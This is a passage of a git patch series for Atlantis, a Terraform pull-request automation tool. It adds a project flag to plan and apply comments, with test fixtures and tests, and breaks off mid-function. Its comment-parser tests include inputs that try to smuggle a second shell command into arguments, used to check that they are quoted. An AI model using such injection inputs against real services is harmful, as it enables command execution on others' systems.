+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/modules/null/main.tf b/server/testfixtures/test-repos/modules/modules/null/main.tf
new file mode 100644
index 0000000000..14f6a189c1
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/modules/null/main.tf
@@ -0,0 +1,10 @@
+variable "var" {}
+resource "null_resource" "this" {
+}
+output "var" {
+  value = "${var.var}"
+}
+
+output "workspace" {
+  value = "${terraform.workspace}"
+}
diff --git a/server/testfixtures/test-repos/modules/production/main.tf b/server/testfixtures/test-repos/modules/production/main.tf
new file mode 100644
index 0000000000..94a103ffba
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/production/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+  source = "../modules/null"
+  var = "production"
+}
+output "var" {
+  value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/staging/main.tf b/server/testfixtures/test-repos/modules/staging/main.tf
new file mode 100644
index 0000000000..15fa81303a
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/staging/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+  source = "../modules/null"
+  var = "staging"
+}
+output "var" {
+  value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
index 1b856aa5c4..5489b642a8 100644
--- a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace`
+- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace`
\ No newline at end of file

From 6b507eb721255dfc830bd00cda60230de5592306 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 19 Jun 2018 18:59:31 +0100
Subject: [PATCH 29/69] Add -p flag.

---
 Makefile                                      |  3 +
 server/events/comment_parser.go               | 18 +++-
 server/events/comment_parser_test.go          | 93 ++++++++++++++++++-
 server/events/event_parser.go                 | 20 ++--
 server/events/event_parser_test.go            | 17 ++--
 server/events/markdown_renderer_test.go       |  8 +-
 server/events/models/models.go                |  1 +
 server/events/pull_request_operator.go        | 45 ++++++++-
 server/events/runtime/apply_step_operator.go  | 11 ++-
 server/events/runtime/plan_step_operater.go   |  7 +-
 server/events/yaml/parser_validator.go        | 83 ++++++++++++++---
 server/events/yaml/parser_validator_test.go   | 72 ++++++++++++++
 server/events/yaml/raw/project.go             |  3 +
 server/events/yaml/raw/project_test.go        |  6 ++
 server/events/yaml/raw/step.go                |  3 +
 server/events/yaml/valid/valid.go             | 10 ++
 server/events_controller.go                   |  4 +-
 server/events_controller_e2e_test.go          | 58 +++++++-----
 .../exp-output-apply-production.txt           |  2 +-
 .../modules-yaml/exp-output-apply-staging.txt |  2 +-
 .../modules-yaml/exp-output-merge.txt         |  4 +-
 .../modules/exp-output-apply-production.txt   |  2 +-
 .../modules/exp-output-apply-staging.txt      |  2 +-
 .../simple-yaml/exp-output-apply-default.txt  |  2 +-
 .../simple-yaml/exp-output-apply-staging.txt  |  2 +-
 ...exp-output-apply-var-default-workspace.txt |  2 +-
 .../exp-output-apply-var-new-workspace.txt    |  2 +-
 .../simple/exp-output-apply-var.txt           |  2 +-
 .../test-repos/simple/exp-output-apply.txt    |  2 +-
 .../tfvars-yaml-no-autoplan/atlantis.yaml     | 29 ++++++
 .../default.backend.tfvars                    |  1 +
 .../tfvars-yaml-no-autoplan/default.tfvars    |  1 +
 .../exp-output-apply-default.txt              | 21 +++++
 .../exp-output-apply-staging.txt              | 21 +++++
 .../exp-output-merge.txt                      |  3 +
 .../exp-output-plan-default.txt               | 23 +++++
 .../exp-output-plan-staging.txt               | 23 +++++
 .../tfvars-yaml-no-autoplan/main.tf           | 19 ++++
 .../staging.backend.tfvars                    |  1 +
 .../tfvars-yaml-no-autoplan/staging.tfvars    |  1 +
 .../test-repos/tfvars-yaml/atlantis.yaml      | 25 +++++
 .../tfvars-yaml/default.backend.tfvars        |  1 +
 .../test-repos/tfvars-yaml/default.tfvars     |  1 +
 .../tfvars-yaml/exp-output-apply-default.txt  | 21 +++++
 .../exp-output-apply-default.txt.act          |  7 ++
 .../tfvars-yaml/exp-output-apply-staging.txt  | 21 +++++
 .../tfvars-yaml/exp-output-autoplan.txt       | 51 ++++++++++
 .../tfvars-yaml/exp-output-autoplan.txt.act   | 61 ++++++++++++
 .../tfvars-yaml/exp-output-merge.txt          |  3 +
 .../test-repos/tfvars-yaml/main.tf            | 19 ++++
 .../tfvars-yaml/staging.backend.tfvars        |  1 +
 .../test-repos/tfvars-yaml/staging.tfvars     |  1 +
 52 files changed, 760 insertions(+), 81 deletions(-)
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/default.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/main.tf
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
 create mode 100644 server/testfixtures/test-repos/tfvars-yaml/staging.tfvars

diff --git a/Makefile b/Makefile
index 442d4b90ee..5f10ddf0eb 100644
--- a/Makefile
+++ b/Makefile
@@ -35,6 +35,9 @@ regen-mocks: ## Delete all mocks and then run go generate to regen them
 	go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)
 
 test: ## Run tests
+	@go test -short $(PKG)
+
+test-all: ## Run tests including integration
 	@go test $(PKG)
 
 test-coverage:
diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index 69e845197a..808d4493a9 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -21,6 +21,7 @@ import (
 	"strings"
 
 	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/spf13/pflag"
 )
 
@@ -29,6 +30,8 @@ const (
 	WorkspaceFlagShort = "w"
 	DirFlagLong        = "dir"
 	DirFlagShort       = "d"
+	ProjectFlagLong    = "project"
+	ProjectFlagShort   = "p"
 	VerboseFlagLong    = "verbose"
 	VerboseFlagShort   = ""
 	DefaultWorkspace   = "default"
@@ -131,6 +134,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 
 	var workspace string
 	var dir string
+	var project string
 	var verbose bool
 	var extraArgs []string
 	var flagSet *pflag.FlagSet
@@ -144,6 +148,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 		flagSet.SetOutput(ioutil.Discard)
 		flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.")
 		flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.")
+		flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Which project to run plan for. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename))
 		flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
 	case Apply.String():
 		name = Apply
@@ -151,6 +156,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 		flagSet.SetOutput(ioutil.Discard)
 		flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.")
 		flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.")
+		flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Apply the plan for this project. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename))
 		flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.")
 	default:
 		return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)}
@@ -198,8 +204,18 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 		return CommentParseResult{CommentResponse: e.errMarkdown(fmt.Sprintf("invalid workspace: %q", workspace), command, flagSet)}
 	}
 
+	// If project is specified, dir or workspace should not be set. Since we
+	// dir/workspace have defaults we can't detect if the user set the flag
+	// to the default or didn't set the flag so there is an edge case here we
+	// don't detect, ex. atlantis plan -p project -d . -w default won't cause
+	// an error.
+	if project != "" && (workspace != DefaultWorkspace || dir != DefaultDir) {
+		err := fmt.Sprintf("cannot use -%s/--%s at same time as -%s/--%s or -%s/--%s", ProjectFlagShort, ProjectFlagLong, DirFlagShort, DirFlagLong, WorkspaceFlagShort, WorkspaceFlagLong)
+		return CommentParseResult{CommentResponse: e.errMarkdown(err, command, flagSet)}
+	}
+
 	return CommentParseResult{
-		Command: NewCommand(dir, extraArgs, name, verbose, workspace, false),
+		Command: NewCommand(dir, extraArgs, name, verbose, workspace, project, false),
 	}
 }
 
diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go
index 81fe4da9f8..db44003724 100644
--- a/server/events/comment_parser_test.go
+++ b/server/events/comment_parser_test.go
@@ -255,6 +255,22 @@ func TestParse_InvalidWorkspace(t *testing.T) {
 	}
 }
 
+func TestParse_UsingProjectAtSameTimeAsWorkspaceOrDir(t *testing.T) {
+	cases := []string{
+		"atlantis plan -w workspace -p project",
+		"atlantis plan -d dir -p project",
+		"atlantis plan -d dir -w workspace -p project",
+	}
+	for _, c := range cases {
+		t.Run(c, func(t *testing.T) {
+			r := commentParser.Parse(c, models.Github)
+			exp := "Error: cannot use -p/--project at same time as -d/--dir or -w/--workspace"
+			Assert(t, strings.Contains(r.CommentResponse, exp),
+				"For comment %q expected CommentResponse %q to contain %q", c, r.CommentResponse, exp)
+		})
+	}
+}
+
 func TestParse_Parsing(t *testing.T) {
 	cases := []struct {
 		flags        string
@@ -262,6 +278,7 @@ func TestParse_Parsing(t *testing.T) {
 		expDir       string
 		expVerbose   bool
 		expExtraArgs string
+		expProject   string
 	}{
 		// Test defaults.
 		{
@@ -270,14 +287,16 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			"",
+			"",
 		},
-		// Test each flag individually.
+		// Test each short flag individually.
 		{
 			"-w workspace",
 			"workspace",
 			".",
 			false,
 			"",
+			"",
 		},
 		{
 			"-d dir",
@@ -285,6 +304,15 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			false,
 			"",
+			"",
+		},
+		{
+			"-p project",
+			"default",
+			".",
+			false,
+			"",
+			"project",
 		},
 		{
 			"--verbose",
@@ -292,6 +320,32 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			true,
 			"",
+			"",
+		},
+		// Test each long flag individually.
+		{
+			"--workspace workspace",
+			"workspace",
+			".",
+			false,
+			"",
+			"",
+		},
+		{
+			"--dir dir",
+			"default",
+			"dir",
+			false,
+			"",
+			"",
+		},
+		{
+			"--project project",
+			"default",
+			".",
+			false,
+			"",
+			"project",
 		},
 		// Test all of them with different permutations.
 		{
@@ -300,6 +354,7 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			true,
 			"",
+			"",
 		},
 		{
 			"-d dir -w workspace --verbose",
@@ -307,6 +362,7 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			true,
 			"",
+			"",
 		},
 		{
 			"--verbose -w workspace -d dir",
@@ -314,6 +370,23 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			true,
 			"",
+			"",
+		},
+		{
+			"-p project --verbose",
+			"default",
+			".",
+			true,
+			"",
+			"project",
+		},
+		{
+			"--verbose -p project",
+			"default",
+			".",
+			true,
+			"",
+			"project",
 		},
 		// Test that flags after -- are ignored
 		{
@@ -322,6 +395,7 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			false,
 			"\"--verbose\"",
+			"",
 		},
 		{
 			"-w workspace -- -d dir --verbose",
@@ -329,6 +403,7 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			"\"-d\" \"dir\" \"--verbose\"",
+			"",
 		},
 		// Test the extra args parsing.
 		{
@@ -337,6 +412,7 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			"",
+			"",
 		},
 		// Test trying to escape quoting
 		{
@@ -345,6 +421,7 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			`"\";echo" "\"hi"`,
+			"",
 		},
 		{
 			"-w workspace -d dir --verbose -- arg one -two --three &&",
@@ -352,6 +429,7 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			true,
 			"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+			"",
 		},
 		// Test whitespace.
 		{
@@ -360,6 +438,7 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			true,
 			"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+			"",
 		},
 		{
 			"   -w   workspace   -d   dir   --verbose   --   arg   one   -two   --three   &&",
@@ -367,6 +446,7 @@ func TestParse_Parsing(t *testing.T) {
 			"dir",
 			true,
 			"\"arg\" \"one\" \"-two\" \"--three\" \"&&\"",
+			"",
 		},
 		// Test that the dir string is normalized.
 		{
@@ -375,6 +455,7 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			"",
+			"",
 		},
 		{
 			"-d /adir",
@@ -382,6 +463,7 @@ func TestParse_Parsing(t *testing.T) {
 			"adir",
 			false,
 			"",
+			"",
 		},
 		{
 			"-d .",
@@ -389,6 +471,7 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			"",
+			"",
 		},
 		{
 			"-d ./",
@@ -396,6 +479,7 @@ func TestParse_Parsing(t *testing.T) {
 			".",
 			false,
 			"",
+			"",
 		},
 		{
 			"-d ./adir",
@@ -403,6 +487,7 @@ func TestParse_Parsing(t *testing.T) {
 			"adir",
 			false,
 			"",
+			"",
 		},
 	}
 	for _, test := range cases {
@@ -428,6 +513,9 @@ func TestParse_Parsing(t *testing.T) {
 var PlanUsage = `Usage of plan:
   -d, --dir string         Which directory to run plan in relative to root of repo,
                            ex. 'child/dir'. (default ".")
+  -p, --project string     Which project to run plan for. Refers to the name of the
+                           project configured in atlantis.yaml. Cannot be used at
+                           same time as workspace or dir flags.
       --verbose            Append Atlantis log to comment.
   -w, --workspace string   Switch to this Terraform workspace before planning.
                            (default "default")
@@ -436,6 +524,9 @@ var PlanUsage = `Usage of plan:
 var ApplyUsage = `Usage of apply:
   -d, --dir string         Apply the plan for this directory, relative to root of
                            repo, ex. 'child/dir'. (default ".")
+  -p, --project string     Apply the plan for this project. Refers to the name of
+                           the project configured in atlantis.yaml. Cannot be used
+                           at same time as workspace or dir flags.
       --verbose            Append Atlantis log to comment.
   -w, --workspace string   Apply the plan for this Terraform workspace. (default
                            "default")
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index 448dcee867..dbdccc8e50 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -47,14 +47,17 @@ type Command struct {
 	// Autoplan is true if the command is a plan command being executed in an
 	// attempt to automatically run plan.
 	Autoplan bool
+	// ProjectName is the name of a project to run the command on. It refers to a
+	// project specified in an atlantis.yaml file.
+	ProjectName string
 }
 
 func (c Command) String() string {
-	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.Autoplan, strings.Join(c.Flags, ","))
+	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, c.Autoplan, strings.Join(c.Flags, ","))
 }
 
 // NewCommand constructs a Command, setting all missing fields to defaults.
-func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command {
+func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string, autoplan bool) *Command {
 	// If dir was an empty string, this will return '.'.
 	validDir := path.Clean(dir)
 	if validDir == "/" {
@@ -64,12 +67,13 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work
 		workspace = DefaultWorkspace
 	}
 	return &Command{
-		Dir:       validDir,
-		Flags:     flags,
-		Name:      name,
-		Verbose:   verbose,
-		Workspace: workspace,
-		Autoplan:  autoplan,
+		Dir:         validDir,
+		Flags:       flags,
+		Name:        name,
+		Verbose:     verbose,
+		Workspace:   workspace,
+		Autoplan:    autoplan,
+		ProjectName: project,
 	}
 }
 
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index 2e9b7e4346..1415ffba3f 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -283,25 +283,26 @@ func TestNewCommand_CleansDir(t *testing.T) {
 
 	for _, c := range cases {
 		t.Run(c.Dir, func(t *testing.T) {
-			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", false)
+			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "", false)
 			Equals(t, c.ExpDir, cmd.Dir)
 		})
 	}
 }
 
 func TestNewCommand_EmptyWorkspace(t *testing.T) {
-	cmd := events.NewCommand("dir", nil, events.Plan, false, "", false)
+	cmd := events.NewCommand("dir", nil, events.Plan, false, "", "", false)
 	Equals(t, "default", cmd.Workspace)
 }
 
 func TestNewCommand_AllFieldsSet(t *testing.T) {
-	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", false)
+	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project", false)
 	Equals(t, events.Command{
-		Workspace: "workspace",
-		Dir:       "dir",
-		Verbose:   true,
-		Flags:     []string{"a", "b"},
-		Name:      events.Plan,
+		Workspace:   "workspace",
+		Dir:         "dir",
+		Verbose:     true,
+		Flags:       []string{"a", "b"},
+		Name:        events.Plan,
+		ProjectName: "project",
 	}, *cmd)
 }
 
diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go
index 414d300810..202097e9be 100644
--- a/server/events/markdown_renderer_test.go
+++ b/server/events/markdown_renderer_test.go
@@ -50,7 +50,7 @@ func TestRenderErr(t *testing.T) {
 		}
 		for _, verbose := range []bool{true, false} {
 			t.Log("testing " + c.Description)
-			s := r.Render(res, c.Command, "log", verbose)
+			s := r.Render(res, c.Command, "log", verbose, false)
 			if !verbose {
 				Equals(t, c.Expected, s)
 			} else {
@@ -88,7 +88,7 @@ func TestRenderFailure(t *testing.T) {
 		}
 		for _, verbose := range []bool{true, false} {
 			t.Log("testing " + c.Description)
-			s := r.Render(res, c.Command, "log", verbose)
+			s := r.Render(res, c.Command, "log", verbose, false)
 			if !verbose {
 				Equals(t, c.Expected, s)
 			} else {
@@ -105,7 +105,7 @@ func TestRenderErrAndFailure(t *testing.T) {
 		Error:   errors.New("error"),
 		Failure: "failure",
 	}
-	s := r.Render(res, events.Plan, "", false)
+	s := r.Render(res, events.Plan, "", false, false)
 	Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s)
 }
 
@@ -263,7 +263,7 @@ func TestRenderProjectResults(t *testing.T) {
 		}
 		for _, verbose := range []bool{true, false} {
 			t.Run(c.Description, func(t *testing.T) {
-				s := r.Render(res, c.Command, "log", verbose)
+				s := r.Render(res, c.Command, "log", verbose, false)
 				if !verbose {
 					Equals(t, c.Expected, s)
 				} else {
diff --git a/server/events/models/models.go b/server/events/models/models.go
index d4ba85fee0..a71251e7b0 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -237,4 +237,5 @@ type ProjectCommandContext struct {
 	// ex. atlantis plan -- -target=resource
 	CommentArgs []string
 	Workspace   string
+	ProjectName string
 }
diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go
index 6012214f52..fabad33d0f 100644
--- a/server/events/pull_request_operator.go
+++ b/server/events/pull_request_operator.go
@@ -1,6 +1,7 @@
 package events
 
 import (
+	"fmt"
 	"os"
 	"path/filepath"
 
@@ -80,6 +81,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 				User:          ctx.User,
 				Log:           ctx.Log,
 				RepoRelPath:   mp.Path,
+				ProjectName:   "",
 				ProjectConfig: nil,
 				GlobalConfig:  nil,
 				CommentArgs:   nil,
@@ -99,6 +101,10 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 		// project config.
 		for i := 0; i < len(matchingProjects); i++ {
 			mp := matchingProjects[i]
+			var projectName string
+			if mp.Name != nil {
+				projectName = *mp.Name
+			}
 			projCtxs = append(projCtxs, models.ProjectCommandContext{
 				BaseRepo:      ctx.BaseRepo,
 				HeadRepo:      ctx.HeadRepo,
@@ -108,6 +114,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 				CommentArgs:   nil,
 				Workspace:     mp.Workspace,
 				RepoRelPath:   mp.Dir,
+				ProjectName:   projectName,
 				ProjectConfig: &mp,
 				GlobalConfig:  &config,
 			})
@@ -139,11 +146,25 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command
 	if err != nil && !os.IsNotExist(err) {
 		return CommandResponse{Error: err}
 	}
-	if !os.IsNotExist(err) {
-		projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+	hasAtlantisYAML := !os.IsNotExist(err)
+	if hasAtlantisYAML {
+		// If they've specified a project by name we look it up. Otherwise we
+		// use the dir and workspace.
+		if ctx.Command.ProjectName != "" {
+			projCfg = config.FindProjectByName(ctx.Command.ProjectName)
+			if projCfg == nil {
+				return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)}
+			}
+		} else {
+			projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+		}
 		globalCfg = &config
 	}
 
+	if ctx.Command.ProjectName != "" && !hasAtlantisYAML {
+		return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)}
+	}
+
 	projCtx := models.ProjectCommandContext{
 		BaseRepo:      ctx.BaseRepo,
 		HeadRepo:      ctx.HeadRepo,
@@ -153,6 +174,7 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command
 		CommentArgs:   ctx.Command.Flags,
 		Workspace:     ctx.Command.Workspace,
 		RepoRelPath:   ctx.Command.Dir,
+		ProjectName:   ctx.Command.ProjectName,
 		ProjectConfig: projCfg,
 		GlobalConfig:  globalCfg,
 	}
@@ -182,11 +204,25 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman
 	if err != nil && !os.IsNotExist(err) {
 		return CommandResponse{Error: err}
 	}
-	if !os.IsNotExist(err) {
-		projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+	hasAtlantisYAML := !os.IsNotExist(err)
+	if hasAtlantisYAML {
+		// If they've specified a project by name we look it up. Otherwise we
+		// use the dir and workspace.
+		if ctx.Command.ProjectName != "" {
+			projCfg = config.FindProjectByName(ctx.Command.ProjectName)
+			if projCfg == nil {
+				return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)}
+			}
+		} else {
+			projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+		}
 		globalCfg = &config
 	}
 
+	if ctx.Command.ProjectName != "" && !hasAtlantisYAML {
+		return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)}
+	}
+
 	projCtx := models.ProjectCommandContext{
 		BaseRepo:      ctx.BaseRepo,
 		HeadRepo:      ctx.HeadRepo,
@@ -196,6 +232,7 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman
 		CommentArgs:   ctx.Command.Flags,
 		Workspace:     ctx.Command.Workspace,
 		RepoRelPath:   ctx.Command.Dir,
+		ProjectName:   ctx.Command.ProjectName,
 		ProjectConfig: projCfg,
 		GlobalConfig:  globalCfg,
 	}
diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_operator.go
index 819bcbf200..7b4a58c80a 100644
--- a/server/events/runtime/apply_step_operator.go
+++ b/server/events/runtime/apply_step_operator.go
@@ -15,13 +15,18 @@ type ApplyStepOperator struct {
 }
 
 func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
-	planPath := filepath.Join(path, ctx.Workspace+".tfplan")
-	stat, err := os.Stat(planPath)
+	// todo: move this to a common library
+	planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
+	if ctx.ProjectName != "" {
+		planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName)
+	}
+	planFile := filepath.Join(path, planFileName)
+	stat, err := os.Stat(planFile)
 	if err != nil || stat.IsDir() {
 		return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace)
 	}
 
-	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planPath)
+	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planFile)
 	var tfVersion *version.Version
 	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
 		tfVersion = ctx.ProjectConfig.TerraformVersion
diff --git a/server/events/runtime/plan_step_operater.go b/server/events/runtime/plan_step_operater.go
index a7fd6793d0..30028dd487 100644
--- a/server/events/runtime/plan_step_operater.go
+++ b/server/events/runtime/plan_step_operater.go
@@ -32,7 +32,12 @@ func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []str
 		return "", err
 	}
 
-	planFile := filepath.Join(path, fmt.Sprintf("%s.tfplan", ctx.Workspace))
+	// todo: move this to a common library
+	planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
+	if ctx.ProjectName != "" {
+		planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName)
+	}
+	planFile := filepath.Join(path, planFileName)
 	userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
 	tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...)
 
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
index 8dc895d132..a56ca586c6 100644
--- a/server/events/yaml/parser_validator.go
+++ b/server/events/yaml/parser_validator.go
@@ -21,7 +21,7 @@ type ParserValidator struct{}
 // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
 // If there was no config file, then this can be detected by checking the type
 // of error: os.IsNotExist(error).
-func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
